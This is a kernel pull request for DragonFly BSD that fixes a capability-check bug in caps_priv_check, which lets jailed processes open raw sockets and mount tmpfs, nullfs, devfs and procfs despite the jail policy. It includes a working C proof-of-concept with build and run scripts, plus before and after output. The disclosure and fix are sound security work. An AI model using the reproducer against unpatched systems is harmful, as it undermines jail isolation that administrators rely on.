### PR TITLE
caps: jail policy bypass via corrupted cap in caps_priv_check

### DIFF
--- a/sys/kern/kern_caps.c
+++ b/sys/kern/kern_caps.c
@@ -332,8 +332,9 @@ caps_priv_check(struct ucred *cred, int cap)
 
 	res = caps_check_cred(cred, cap);
 	if (cap & __SYSCAP_GROUP_MASK) {
-		cap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT;
-		res |= caps_check_cred(cred, cap);
+		int gcap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT;
+
+		res |= caps_check_cred(cred, gcap);
 	}
 	if (res & __SYSCAP_SELF)
 		return EPERM;


### PR DESCRIPTION
# caps: jail policy bypass via corrupted cap in caps_priv_check

`caps_priv_check()` in `sys/kern/kern_caps.c` checks the capability against the credential, then, if the cap carries a group bit, reuses the `cap` parameter itself to hold the group-shifted value before calling `caps_check_cred()` again, and finally hands that now-corrupted `cap` to `prison_priv_check()`. Because `cap` has been narrowed to the group, the per-capability switch in `prison_priv_check()` never reaches the cases that consult `PRISON_CAP_NET_RAW_SOCKETS` / `PRISON_CAP_VFS_MOUNT_*`: `SYSCAP_NONET_RAW` (`0x61`) collapses to `SYSCAP_NONET` (`0x6`) and `SYSCAP_NOMOUNT_NULLFS`/`_TMPFS`/`_DEVFS`/`_PROCFS` (`0xA0`/`0xA2`/`0xA1`/`0xA5`) all collapse to `SYSCAP_NOMOUNT` (`0xA`). Those group cases return 0 (allowed in jail), so a process inside a default-policy jail opens raw IP sockets and mounts tmpfs, nullfs, devfs and procfs even though `jail.defaults.allow_raw_sockets` and the four `vfs_mount_*` knobs are all 0.

## Fix

Use a separate local `gcap` for the group-mask check so the original `cap` reaches `prison_priv_check()` intact and the per-capability jail policy cases actually run.

## Before / after

`#0 unpatched` (DragonFly 6.5-DEVELOPMENT), root creates a default-policy jail (`allow_raw_sockets=0`, all `vfs_mount_*=0`), attaches, and attempts each gated action:

```
jail.defaults.allow_raw_sockets: 0
jail.defaults.vfs_mount_nullfs: 0
...
  socket(AF_INET, SOCK_RAW, IPPROTO_RAW)  -> OK fd=3   *** BYPASS ***
  mount("tmpfs",  ...tmpfs)   -> OK   *** BYPASS ***
  mount("null",   ...nullfs)  -> OK   *** BYPASS ***
  mount("devfs",  ...devfs)   -> OK   *** BYPASS ***
  mount("procfs", ...procfs)  -> OK   *** BYPASS ***
=== end: 5 cap-gated action(s) bypassed jail policy ===
```

`#1 patched` (same kernel + this fix), identical jail and actions:

```
  socket(AF_INET, SOCK_RAW, IPPROTO_RAW)  -> Operation not permitted (errno=1)
  mount("tmpfs",  ...tmpfs)   -> Operation not permitted (errno=1)
  mount("null",   ...nullfs)  -> Operation not permitted (errno=1)
  mount("devfs",  ...devfs)   -> Operation not permitted (errno=1)
  mount("procfs", ...procfs)  -> Operation not permitted (errno=1)
=== end: 0 cap-gated action(s) bypassed jail policy ===
```

## Reproducer

Run as root on the host. Creates a jail with the default policy, attaches via `jail(2)`, then attempts each cap-gated action from inside. `bypass.c`:

```c
/*
 * caps_priv_check cap-corruption -> jail policy bypass.
 *
 * Run as root on the host. Creates a jail with the DEFAULT policy
 * (allow_raw_sockets=0, vfs_mount_nullfs=0, vfs_mount_tmpfs=0,
 *  vfs_mount_devfs=0, vfs_mount_procfs=0), attaches to it via jail(2),
 * then attempts the cap-gated actions inside the jail.
 *
 * Mechanism (confirmed in sys/kern/kern_caps.c:333-340):
 *
 *   res = caps_check_cred(cred, cap);
 *   if (cap & __SYSCAP_GROUP_MASK) {
 *       cap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT; <-- BUG
 *       res |= caps_check_cred(cred, cap);
 *   }
 *   if (res & __SYSCAP_SELF) return EPERM;
 *   return (prison_priv_check(cred, cap));                <-- WRONG cap
 *
 * For cap = SYSCAP_NONET_RAW     = 0x61:  cap becomes 0x6  = SYSCAP_NONET
 * For cap = SYSCAP_NOMOUNT_NULLFS= 0xA0:  cap becomes 0xA  = SYSCAP_NOMOUNT
 * For cap = SYSCAP_NOMOUNT_TMPFS = 0xA2:  cap becomes 0xA  = SYSCAP_NOMOUNT
 * For cap = SYSCAP_NOMOUNT_DEVFS = 0xA1:  cap becomes 0xA  = SYSCAP_NOMOUNT
 * For cap = SYSCAP_NOMOUNT_PROCFS= 0xA5:  cap becomes 0xA  = SYSCAP_NOMOUNT
 *
 * In prison_priv_check (sys/kern/kern_jail.c:865-878):
 *     case SYSCAP_NONET:    return 0;   <-- allowed in jail
 *     case SYSCAP_NOMOUNT:  return 0;   <-- allowed in jail
 *
 * The per-capability switch cases that SHOULD have been hit:
 *     case SYSCAP_NONET_RAW:    check PRISON_CAP_NET_RAW_SOCKETS (line 919)
 *     case SYSCAP_NOMOUNT_NULLFS: check PRISON_CAP_VFS_MOUNT_NULLFS (951)
 *     ... etc.
 * are NEVER reached on the caps_priv_check() path.
 *
 * Output: one line per action; "*** BYPASS ***" appears when the per-cap
 * jail policy was bypassed (action succeeded despite policy=0).
 *
 * On a FIXED kernel every action fails with EPERM.
 */
#include <sys/param.h>
#include <sys/jail.h>
#include <sys/mount.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <arpa/inet.h>

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Match the kernel's struct null_args (sys/vfs/nullfs/null.h) */
struct df_null_args {
    char              *target;
    struct export_args export;
};

static int bypass_count = 0;

static void try_raw_socket_v4(void)
{
    int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (s >= 0) {
        printf("  socket(AF_INET, SOCK_RAW, IPPROTO_RAW)  [SYSCAP_NONET_RAW]\n");
        printf("      -> OK fd=%d   *** BYPASS ***\n", s);
        close(s);
        bypass_count++;
    } else {
        printf("  socket(AF_INET, SOCK_RAW, IPPROTO_RAW)  -> %s (errno=%d)  -- correctly denied\n",
               strerror(errno), errno);
    }
}

static void try_mount(const char *fstype, const char *cap_name, const char *target,
                      void *data)
{
    int r = mount(fstype, target, 0, data);
    if (r == 0) {
        printf("  mount(\"%s\", %s)  [%s]\n", fstype, target, cap_name);
        printf("      -> OK   *** BYPASS ***\n");
        unmount(target, 0);
        bypass_count++;
    } else {
        printf("  mount(\"%s\", %s)  [%s] -> %s (errno=%d)\n",
               fstype, target, cap_name, strerror(errno), errno);
    }
}

int main(void)
{
    int jid;
    struct jail_v0 jv0;

    /* Set up directories. */
    mkdir("/tmp/capbypass-src",          0755);
    mkdir("/tmp/capbypass-mnt-tmpfs",    0755);
    mkdir("/tmp/capbypass-mnt-devfs",    0755);
    mkdir("/tmp/capbypass-mnt-procfs",   0755);
    mkdir("/tmp/capbypass-mnt-nullfs",   0755);

    /* Drop a marker file in the nullfs source so we can prove the mount
     * actually exposes host content inside the jail. */
    FILE *m = fopen("/tmp/capbypass-src/marker", "w");
    if (m) { fprintf(m, "HOST-CONTENT-VIA-NULLFS-BYPASS"); fclose(m); }

    /* jail(2) registers the prison AND attaches the calling process
     * (kern_jail_attach at sys/kern/kern_jail.c:227). Default policy
     * has all gated PRISON_CAP_* flags cleared. */
    jv0.version   = 0;
    jv0.path      = "/";
    jv0.hostname  = "capbypass-test";
    jv0.ip_number = inet_addr("127.0.0.2");

    jid = jail((struct jail *)&jv0);
    if (jid < 0) {
        fprintf(stderr, "jail() failed: %s (errno=%d)\n",
                strerror(errno), errno);
        return 2;
    }
    fprintf(stderr, "jail() ok: jid=%d  (now jailed as uid=%d)\n",
            jid, getuid());

    printf("=== cap-gated actions inside jail ===\n");
    printf("    (jail default policy: allow_raw_sockets=0,\n");
    printf("     vfs_mount_{nullfs,tmpfs,devfs,procfs}=0 -> all should EPERM)\n");

    try_raw_socket_v4();
    try_mount("tmpfs",  "SYSCAP_NOMOUNT_TMPFS",  "/tmp/capbypass-mnt-tmpfs",  NULL);

    /* nullfs: kernel's get_fscap() matches fstype "null" (5-byte strncmp),
     * NOT "nullfs" -- so the user-side type name must be the bare "null". */
    {
        struct df_null_args na; memset(&na, 0, sizeof(na));
        na.target = (char *)"/tmp/capbypass-src";
        try_mount("null", "SYSCAP_NOMOUNT_NULLFS", "/tmp/capbypass-mnt-nullfs", &na);
    }
    try_mount("devfs",  "SYSCAP_NOMOUNT_DEVFS",  "/tmp/capbypass-mnt-devfs",  NULL);
    try_mount("procfs", "SYSCAP_NOMOUNT_PROCFS", "/tmp/capbypass-mnt-procfs", NULL);

    printf("=== end: %d cap-gated action(s) bypassed jail policy ===\n",
           bypass_count);
    return bypass_count ? 0 : 1;
}
```

`build.sh`:

```sh
#!/bin/sh
# build. No external deps; just cc.
set -e
cd "$(dirname "$0")"
cc -O2 -Wall -o bypass bypass.c
echo "BUILD_OK bypass"
ls -l bypass
```

`run.sh` (must be invoked as root on the guest):

```sh
#!/bin/sh
# run. Must be invoked as root on the guest.
# Creates a jail with defaults (raw_sockets=0, vfs_mount_nullfs=0, etc.),
# attaches to it, then tries the cap-gated actions.
set -e
cd "$(dirname "$0")"
# Sanity: ensure jail defaults are restrictive (the baseline state).
sysctl jail.defaults.allow_raw_sockets >/dev/null 2>&1 || true
sysctl jail.defaults.vfs_mount_nullfs  >/dev/null 2>&1 || true
echo "---- jail default policy (should all be 0): ----"
sysctl jail.defaults.allow_raw_sockets jail.defaults.vfs_mount_nullfs \
       jail.defaults.vfs_mount_tmpfs jail.defaults.vfs_mount_devfs \
       jail.defaults.vfs_mount_procfs 2>/dev/null || true
echo "---- running bypass as root (will create + enter jail): ----"
./bypass
echo "RC=$?"
```

Build and run:

```
sh ./build.sh
sh ./run.sh          # as root: 5 BYPASS on unpatched, 0 on patched
```
